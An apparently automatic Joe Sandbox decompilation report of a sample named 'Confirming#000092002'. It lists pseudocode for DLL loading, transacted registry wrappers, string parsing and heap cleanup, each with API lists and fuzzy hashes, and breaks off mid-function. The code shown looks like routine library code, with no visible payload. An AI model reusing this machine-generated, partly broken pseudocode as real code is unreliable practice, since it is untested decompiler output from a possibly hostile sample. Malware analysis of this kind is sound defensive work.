    				WCHAR* _v8;
    				signed int _t11;
    				WCHAR* _t12;
    				struct HINSTANCE__* _t16;
    				struct HINSTANCE__* _t18;
    				signed int* _t22;
    				signed int* _t26;
    				struct HINSTANCE__* _t29;
    				WCHAR* _t31;
    				void* _t32;
    
    				_t26 = _a4;
    				while(_t26 != _a8) {
    					_t11 =  *_t26;
    					_t22 = 0xfe27c4 + _t11 * 4;
    					_t29 =  *_t22;
    					if(_t29 == 0) {
    						_t12 =  *(0xeb1dbc + _t11 * 4);
    						_v8 = _t12;
    						_t29 = LoadLibraryExW(_t12, 0, 0x800);
    						if(_t29 != 0) {
    							L13:
    							 *_t22 = _t29;
    							if( *_t22 != 0) {
    								FreeLibrary(_t29);
    							}
    							L15:
    							_t16 = _t29;
    							L12:
    							return _t16;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L8:
    							 *_t22 = _t18 | 0xffffffff;
    							L9:
    							_t26 =  &(_t26[1]);
    							continue;
    						}
    						_t31 = _v8;
    						_t18 = E00EA8B48(_t31, L"api-ms-", 7);
    						_t32 = _t32 + 0xc;
    						if(_t18 == 0) {
    							goto L8;
    						}
    						_t18 = LoadLibraryExW(_t31, 0, 0);
    						_t29 = _t18;
    						if(_t29 != 0) {
    							goto L13;
    						}
    						goto L8;
    					}
    					if(_t29 != 0xffffffff) {
    						goto L15;
    					}
    					goto L9;
    				}
    				_t16 = 0;
    				goto L12;
    			}

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,?,00EA6F05,?,?,00FE276C,00000000,?,00EA7030,00000004,InitializeCriticalSectionEx,00EB1EB0,InitializeCriticalSectionEx,00000000), ref: 00EA6ED3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: a855665e636913cd46fa075a17328237c2af071be7d9ef7db7d62cb4061a619d
    • Instruction ID: dfb33a690b00bf301ce6033fa51d78d5d535949b075be42975119c3080b1f7ca
    • Opcode Fuzzy Hash: a855665e636913cd46fa075a17328237c2af071be7d9ef7db7d62cb4061a619d
    • Instruction Fuzzy Hash: 08110A3AA01225ABCB215768DC5179B37A49F0B774F189251EA11FF280D770FF0486D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00EA1348(intOrPtr* __ecx, void* _a4, char* _a8, void** _a32, int* _a36) {
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t14;
    				intOrPtr* _t18;
    
    				_t18 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36);
    				}
    				_t13 = GetModuleHandleA("Advapi32.dll");
    				if(_t13 == 0) {
    					goto L6;
    				}
    				_t14 = GetProcAddress(_t13, "RegCreateKeyTransactedA");
    				if(_t14 == 0) {
    					goto L6;
    				}
    				return  *_t14(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36,  *_t18, 0);
    			}

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA135A
    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00EA136A
    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00EA13AA
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: AddressCreateHandleModuleProc
    • String ID: Advapi32.dll$RegCreateKeyTransactedA
    • API String ID: 1964897782-1184998024
    • Opcode ID: ba39a93603768a94297e681ef04cb521514fc2ae5ddecd9d2a819df39f95cd3d
    • Instruction ID: b8627ddd0a43a96fe3e148c8c57e5b86992c8c2e1a25cd70159547fe20a839d7
    • Opcode Fuzzy Hash: ba39a93603768a94297e681ef04cb521514fc2ae5ddecd9d2a819df39f95cd3d
    • Instruction Fuzzy Hash: 93016232104244BADF310F929C08DA77E7DEBCEB55B019269FA09B4410D671E854EB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00EA12E5(intOrPtr* __ecx, void* _a4, char* _a8, int _a16, void** _a20) {
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t14;
    				intOrPtr* _t18;
    
    				_t18 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegOpenKeyExA(_a4, _a8, 0, _a16, _a20);
    				}
    				_t13 = GetModuleHandleA("Advapi32.dll");
    				if(_t13 == 0) {
    					goto L6;
    				}
    				_t14 = GetProcAddress(_t13, "RegOpenKeyTransactedA");
    				if(_t14 == 0) {
    					goto L6;
    				}
    				return  *_t14(_a4, _a8, 0, _a16, _a20,  *_t18, 0);
    			}

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA12F7
    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00EA1307
    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00EA1337
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: AddressHandleModuleOpenProc
    • String ID: Advapi32.dll$RegOpenKeyTransactedA
    • API String ID: 1337834000-496252237
    • Opcode ID: 0c5f4b9b58dc03065d55b54fab13bcabe1b1ce34c9de28b13992ee3c8279e405
    • Instruction ID: b3fb666ae6a8e96975c0d683945fa3218c54b61a7f483578471c5e13b9426823
    • Opcode Fuzzy Hash: 0c5f4b9b58dc03065d55b54fab13bcabe1b1ce34c9de28b13992ee3c8279e405
    • Instruction Fuzzy Hash: 8AF0AF32100205FFCF221F92EC04DEB7F6EEB8AB51B408069F941B9420C7329865EB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00EA1596(void** __ecx, char* _a4) {
    				_Unknown_base(*)()* _t6;
    				struct HINSTANCE__* _t9;
    
    				_t13 = __ecx;
    				_t12 =  *((intOrPtr*)(__ecx + 8));
    				if( *((intOrPtr*)(__ecx + 8)) == 0) {
    					if( *0xfe2e00 != 0) {
    						_t6 =  *0xfe2dfc; // 0x0
    					} else {
    						_t9 = GetModuleHandleA("Advapi32.dll");
    						if(_t9 == 0) {
    							_t6 =  *0xfe2dfc; // 0x0
    						} else {
    							_t6 = GetProcAddress(_t9, "RegDeleteKeyExA");
    							 *0xfe2dfc = _t6;
    						}
    						 *0xfe2e00 = 1;
    					}
    					if(_t6 == 0) {
    						return RegDeleteKeyA( *_t13, _a4);
    					} else {
    						return  *_t6( *_t13, _a4, _t13[1], 0);
    					}
    				}
    				return E00EA13BB(_t12,  *((intOrPtr*)(__ecx)), _a4);
    			}






    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,?,00EA339A,?), ref: 00EA15BD
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00EA15CD
      • Part of subcall function 00EA13BB: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA13CD
      • Part of subcall function 00EA13BB: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00EA13DD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyExA
    • API String ID: 1646373207-1984814126
    • Opcode ID: 96b997f5150892ffa1f0dafc259f35b49371c28cf3e70acb74dcdb08726801a1
    • Instruction ID: ad3d967fd131e9ba28eabdfc93159dd4573da7db79e0dc03d54fd9ca61c268a2
    • Opcode Fuzzy Hash: 96b997f5150892ffa1f0dafc259f35b49371c28cf3e70acb74dcdb08726801a1
    • Instruction Fuzzy Hash: C7012635908245EFEB218F92DC04FA27BAABB49381F0450AAF543BD160CB72E910FB00
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E00EAD164(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				intOrPtr _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t41;
    				signed int _t49;
    				void* _t51;
    				signed int _t55;
    				intOrPtr _t63;
    				intOrPtr _t69;
    				void* _t71;
    				intOrPtr* _t72;
    				intOrPtr _t86;
    				void* _t89;
    				intOrPtr* _t91;
    				intOrPtr _t93;
    				void* _t94;
    				void* _t95;
    				signed int _t96;
    				void* _t97;
    				intOrPtr* _t98;
    				intOrPtr* _t100;
    				void* _t103;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t41 =  *0xeb9008; // 0x64e1d101
    				_v8 = _t41 ^ _t96;
    				_t93 = _a20;
    				if(_t93 > 0) {
    					_t69 = E00EAE5EF(_a16, _t93);
    					_t103 = _t69 - _t93;
    					_t4 = _t69 + 1; // 0x1
    					_t93 = _t4;
    					if(_t103 >= 0) {
    						_t93 = _t69;
    					}
    				}
    				_t88 = _a32;
    				if(_a32 == 0) {
    					_t88 =  *((intOrPtr*)( *_a4 + 8));
    					_a32 =  *((intOrPtr*)( *_a4 + 8));
    				}
    				_t86 = E00EAB0CA(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
    				_t98 = _t97 + 0x18;
    				_v12 = _t86;
    				if(_t86 == 0) {
    					L39:
    					_pop(_t89);
    					_pop(_t94);
    					_pop(_t71);
    					return E00EA403C(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
    				} else {
    					_t17 = _t86 + _t86 + 8; // 0x8
    					asm("sbb eax, eax");
    					_t49 = _t86 + _t86 & _t17;
    					if(_t49 == 0) {
    						_t72 = 0;
    						L15:
    						if(_t72 == 0) {
    							L37:
    							_t95 = 0;
    							L38:
    							E00EABF54(_t72);
    							_t46 = _t95;
    							goto L39;
    						}
    						_t51 = E00EAB0CA(_t88, 1, _a16, _t93, _t72, _t86);
    						_t100 = _t98 + 0x18;
    						if(_t51 == 0) {
    							goto L37;
    						}
    						_t90 = _v12;
    						_t95 = E00EA99EA(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
    						if(_t95 == 0) {
    							goto L37;
    						}
    						_t86 = 0x400;
    						if((_a12 & 0x00000400) == 0) {
    							_t31 = _t95 + _t95 + 8; // 0x8
    							asm("sbb eax, eax");
    							_t55 = _t95 + _t95 & _t31;
    							if(_t55 == 0) {
    								_t91 = 0;
    								L31:
    								if(_t91 == 0 || E00EA99EA(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
    									L36:
    									E00EABF54(_t91);
    									goto L37;
    								} else {
    									_push(0);
    									_push(0);
    									if(_a28 != 0) {
    										_push(_a28);
    										_push(_a24);
    									} else {
    										_push(0);
    										_push(0);
    									}
    									_push(_t95);
    									_push(_t91);
    									_push(0);
    									_push(_a32);
    									_t95 = E00EAB146();
    									if(_t95 != 0) {
    										E00EABF54(_t91);
    										goto L38;
    									} else {
    										goto L36;
    									}
    								}
    							}
    							if(_t55 > 0x400) {
    								_t91 = E00EA8BBC(_t55);
    								if(_t91 == 0) {
    									goto L36;
    								}
    								 *_t91 = 0xdddd;
    								L29:
    								_t91 = _t91 + 8;
    								goto L31;
    							}
    							E00EB02F0(_t55);
    							_t91 = _t100;
    							if(_t91 == 0) {
    								goto L36;
    							}
    							 *_t91 = 0xcccc;
    							goto L29;
    						}
    						_t63 = _a28;
    						if(_t63 == 0) {
    							goto L38;
    						}
    						if(_t95 > _t63) {
    							goto L37;
    						}
    						_t95 = E00EA99EA(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
    						if(_t95 != 0) {
    							goto L38;
    						}
    						goto L37;
    					}
    					if(_t49 > 0x400) {
    						_t72 = E00EA8BBC(_t49);
    						if(_t72 == 0) {
    							L13:
    							_t86 = _v12;
    							goto L15;
    						}
    						 *_t72 = 0xdddd;
    						L12:
    						_t72 = _t72 + 8;
    						goto L13;
    					}
    					E00EB02F0(_t49);
    					_t72 = _t98;
    					if(_t72 == 0) {
    						goto L13;
    					}
    					 *_t72 = 0xcccc;
    					goto L12;
    				}
    			}





























    APIs
    • __alloca_probe_16.LIBCMT ref: 00EAD1E8
    • __alloca_probe_16.LIBCMT ref: 00EAD2AE
    • __freea.LIBCMT ref: 00EAD31A
      • Part of subcall function 00EA8BBC: HeapAlloc.KERNEL32(00000000,00EA3522,?,?,00EA3CF2,?,00000000,?,00EA3522,?), ref: 00EA8BEE
    • __freea.LIBCMT ref: 00EAD323
    • __freea.LIBCMT ref: 00EAD346
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: __freea$__alloca_probe_16$AllocHeap
    • String ID:
    • API String ID: 1096550386-0
    • Opcode ID: 2d9d1cdb6da19cf02694a47726ce62105c8f92bf5608342bf94e97ae1cce820e
    • Instruction ID: dfdbf14fec3ed9ee7696700d470b14faf0f73bf4829f3a96e637a9871d7e6dd1
    • Opcode Fuzzy Hash: 2d9d1cdb6da19cf02694a47726ce62105c8f92bf5608342bf94e97ae1cce820e
    • Instruction Fuzzy Hash: F751D072A04206ABEF219F648C81EBB37E9EF8A754F155128FC06BF551E730FC1486A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00EA2327(CHAR** __ecx, CHAR* _a4) {
    				char* _v8;
    				CHAR** _v12;
    				char _t16;
    				void* _t17;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				CHAR* _t23;
    				CHAR* _t24;
    				CHAR* _t26;
    				CHAR* _t29;
    				CHAR* _t30;
    				CHAR* _t36;
    				CHAR* _t39;
    				void* _t40;
    				void* _t45;
    				char _t46;
    				CHAR* _t51;
    				char* _t56;
    				CHAR** _t58;
    				void* _t61;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t58 = __ecx;
    				_v12 = __ecx;
    				E00EA22FE(__ecx);
    				_t36 =  *__ecx;
    				_t16 =  *_t36;
    				if(_t16 == 0) {
    					L27:
    					_t17 = 0x80020009;
    				} else {
    					_t56 = _a4;
    					_v8 = _t56;
    					if(_t16 != 0x27) {
    						while(1) {
    							_t19 = _t16 - 9;
    							if(_t19 == 0) {
    								break;
    							}
    							_t20 = _t19 - 1;
    							if(_t20 == 0) {
    								break;
    							} else {
    								_t21 = _t20 - 3;
    								if(_t21 == 0 || _t21 == 0x13) {
    									break;
    								} else {
    									_t23 = CharNextA(_t36);
    									 *_t58 = _t23;
    									_t24 = _t23 - _t36;
    									_a4 = _t24;
    									if(_t56 + 1 + _t24 >= _v8 + 0x1000) {
    										goto L27;
    									} else {
    										_t45 = 0;
    										if(_t24 > 0) {
    											_t51 = _t24;
    											do {
    												 *_t56 = _t36[_t45];
    												_t56 = _t56 + 1;
    												_t45 = _t45 + 1;
    											} while (_t45 < _t51);
    										}
    										_t36 =  *_t58;
    										_t16 =  *_t36;
    										if(_t16 != 0) {
    											continue;
    										} else {
    											break;
    										}
    									}
    								}
    							}
    							goto L28;
    						}
    						 *_t56 = 0;
    						goto L26;
    					} else {
    						_t26 = CharNextA(_t36);
    						 *_t58 = _t26;
    						_t46 =  *_t26;
    						if(_t46 == 0) {
    							L14:
    							if( *( *_t58) == 0) {
    								goto L27;
    							} else {
    								 *_t56 = 0;
    								 *_t58 = CharNextA( *_t58);
    								L26:
    								_t17 = 0;
    							}
    						} else {
    							while(_t46 != 0x27 ||  *(CharNextA(_t26)) == 0x27) {
    								_t29 =  *_t58;
    								if( *_t29 == 0x27) {
    									 *_t58 = CharNextA(_t29);
    								}
    								_t30 =  *_t58;
    								_a4 = _t30;
    								_t39 = CharNextA(_t30);
    								 *_t58 = _t39;
    								_t40 = _t39 - _a4;
    								if(_t56 + 1 + _t40 >= _v8 + 0x1000) {
    									goto L27;
    								} else {
    									if(_t40 > 0) {
    										_t61 = _a4 - _t56;
    										do {
    											 *_t56 =  *((intOrPtr*)(_t61 + _t56));
    											_t56 = _t56 + 1;
    											_t40 = _t40 - 1;
    										} while (_t40 != 0);
    										_t58 = _v12;
    									}
    									_t26 =  *_t58;
    									_t46 =  *_t26;
    									if(_t46 == 0) {
    										goto L27;
    									} else {
    										continue;
    									}
    								}
    								goto L28;
    							}
    							goto L14;
    						}
    					}
    				}
    				L28:
    				return _t17;
    			}

























    APIs
      • Part of subcall function 00EA22FE: CharNextA.USER32(?,?,00EA2339,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA231B
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
    • CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5
    • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23F3
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: CharNext
    • String ID:
    • API String ID: 3213498283-0
    • Opcode ID: 3693f6b978da2096d6baf10a73c908b5df5cd42c17581b25d98071b3a77f8103
    • Instruction ID: f1997180daab5a44e5fdad2b425a2232016a68ecd5df160c29b4bfae2cd6612c
    • Opcode Fuzzy Hash: 3693f6b978da2096d6baf10a73c908b5df5cd42c17581b25d98071b3a77f8103
    • Instruction Fuzzy Hash: 6C41D0305002829FDF258F3DC8946A9BBE5AF1F344B68696CD6C5FB216D274A845C760
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EABCA8(intOrPtr* _a4) {
    				intOrPtr _t6;
    				intOrPtr* _t21;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_t23 =  *_t21 -  *0xeb96e8; // 0xeb9738
    					if(_t23 != 0) {
    						E00EA8B82(_t7);
    					}
    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xeb96ec; // 0xfe2dd8
    					if(_t24 != 0) {
    						E00EA8B82(_t8);
    					}
    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xeb96f0; // 0xfe2dd8
    					if(_t25 != 0) {
    						E00EA8B82(_t9);
    					}
    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xeb9718; // 0xeb973c
    					if(_t26 != 0) {
    						E00EA8B82(_t10);
    					}
    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
    					_t27 = _t6 -  *0xeb971c; // 0xfe2ddc
    					if(_t27 != 0) {
    						return E00EA8B82(_t6);
    					}
    				}
    				return _t6;
    			}











    APIs
    • _free.LIBCMT ref: 00EABCC0
      • Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
      • Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA
    • _free.LIBCMT ref: 00EABCD2
    • _free.LIBCMT ref: 00EABCE4
    • _free.LIBCMT ref: 00EABCF6
    • _free.LIBCMT ref: 00EABD08
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: a915595f67cbb017b941a32d0322d7425a79b2dcb7c718c41258ccba79a577fd
    • Instruction ID: a5b7b9148dadde47a21054e69e131969d9c80bb5b9b3dda0c593eb237a7d3319
    • Opcode Fuzzy Hash: a915595f67cbb017b941a32d0322d7425a79b2dcb7c718c41258ccba79a577fd
    • Instruction Fuzzy Hash: 6FF01272904610ABC620EF69F6C6C5777D9AB1A735B586905F145FF502CF30FD808660
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00EAA03C(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
    				intOrPtr _v0;
    				signed int _v6;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr* _v72;
    				intOrPtr* _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				signed int _v124;
    				struct _WIN32_FIND_DATAW _v608;
    				char _v609;
    				intOrPtr* _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				union _FINDEX_INFO_LEVELS _v628;
    				signed int _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				union _FINDEX_INFO_LEVELS _v640;
    				signed int _v644;
    				signed int _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				union _FINDEX_INFO_LEVELS _v664;
    				signed int _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				union _FINDEX_INFO_LEVELS _v676;
    				intOrPtr _v724;
    				void* __ebx;
    				void* __edi;
    				intOrPtr* _t131;
    				signed int _t132;
    				signed int _t134;
    				signed int _t139;
    				signed int _t140;
    				intOrPtr* _t150;
    				signed int _t152;
    				intOrPtr _t153;
    				signed int _t157;
    				signed int _t159;
    				signed int _t164;
    				signed int _t166;
    				char _t168;
    				signed char _t169;
    				signed int _t175;
    				union _FINDEX_INFO_LEVELS _t179;
    				signed int _t185;
    				union _FINDEX_INFO_LEVELS _t188;
    				intOrPtr* _t196;
    				signed int _t199;
    				intOrPtr _t204;
    				signed int _t206;
    				signed int _t209;
    				signed int _t211;
    				signed int _t212;
    				signed int _t213;
    				signed int _t215;
    				signed int _t217;
    				signed int _t218;
    				signed int* _t219;
    				signed int _t222;
    				void* _t225;
    				union _FINDEX_INFO_LEVELS _t226;
    				void* _t227;
    				intOrPtr _t229;
    				signed int _t232;
    				signed int _t233;
    				signed int _t234;
    				signed int _t236;
    				intOrPtr* _t239;
    				signed int _t241;
    				intOrPtr* _t244;
    				signed int _t249;
    				signed int _t255;
    				signed int _t257;
    				signed int _t263;
    				intOrPtr* _t264;
    				signed int _t272;
    				signed int _t274;
    				intOrPtr* _t275;
    				void* _t277;
    				signed int _t280;
    				signed int _t283;
    				signed int _t285;
    				intOrPtr _t287;
    				void* _t288;
    				signed int* _t292;
    				signed int _t293;
    				signed int _t295;
    				signed int _t296;
    				signed int _t297;
    				signed int _t299;
    				void* _t300;
    				void* _t301;
    				signed int _t302;
    				void* _t306;
    				signed int _t307;
    				void* _t308;
    				void* _t309;
    				void* _t310;
    				signed int _t311;
    				void* _t312;
    				void* _t313;
    
    				_t131 = _a8;
    				_t309 = _t308 - 0x28;
    				_push(__esi);
    				_t317 = _t131;
    				if(_t131 != 0) {
    					_t292 = _a4;
    					_t222 = 0;
    					 *_t131 = 0;
    					_t283 = 0;
    					_t132 =  *_t292;
    					_t232 = 0;
    					_v608.cAlternateFileName = 0;
    					_v40 = 0;
    					_v36 = 0;
    					__eflags = _t132;
    					if(_t132 == 0) {
    						L9:
    						_v8 = _t222;
    						_t134 = _t232 - _t283;
    						_t293 = _t283;
    						_v12 = _t293;
    						_t271 = (_t134 >> 2) + 1;
    						_t136 = _t134 + 3 >> 2;
    						__eflags = _t232 - _t293;
    						_v16 = (_t134 >> 2) + 1;
    						asm("sbb esi, esi");
    						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
    						__eflags = _t295;
    						if(_t295 != 0) {
    							_t213 = _t283;
    							_t280 = _t222;
    							do {
    								_t264 =  *_t213;
    								_t20 = _t264 + 1; // 0x1
    								_v20 = _t20;
    								do {
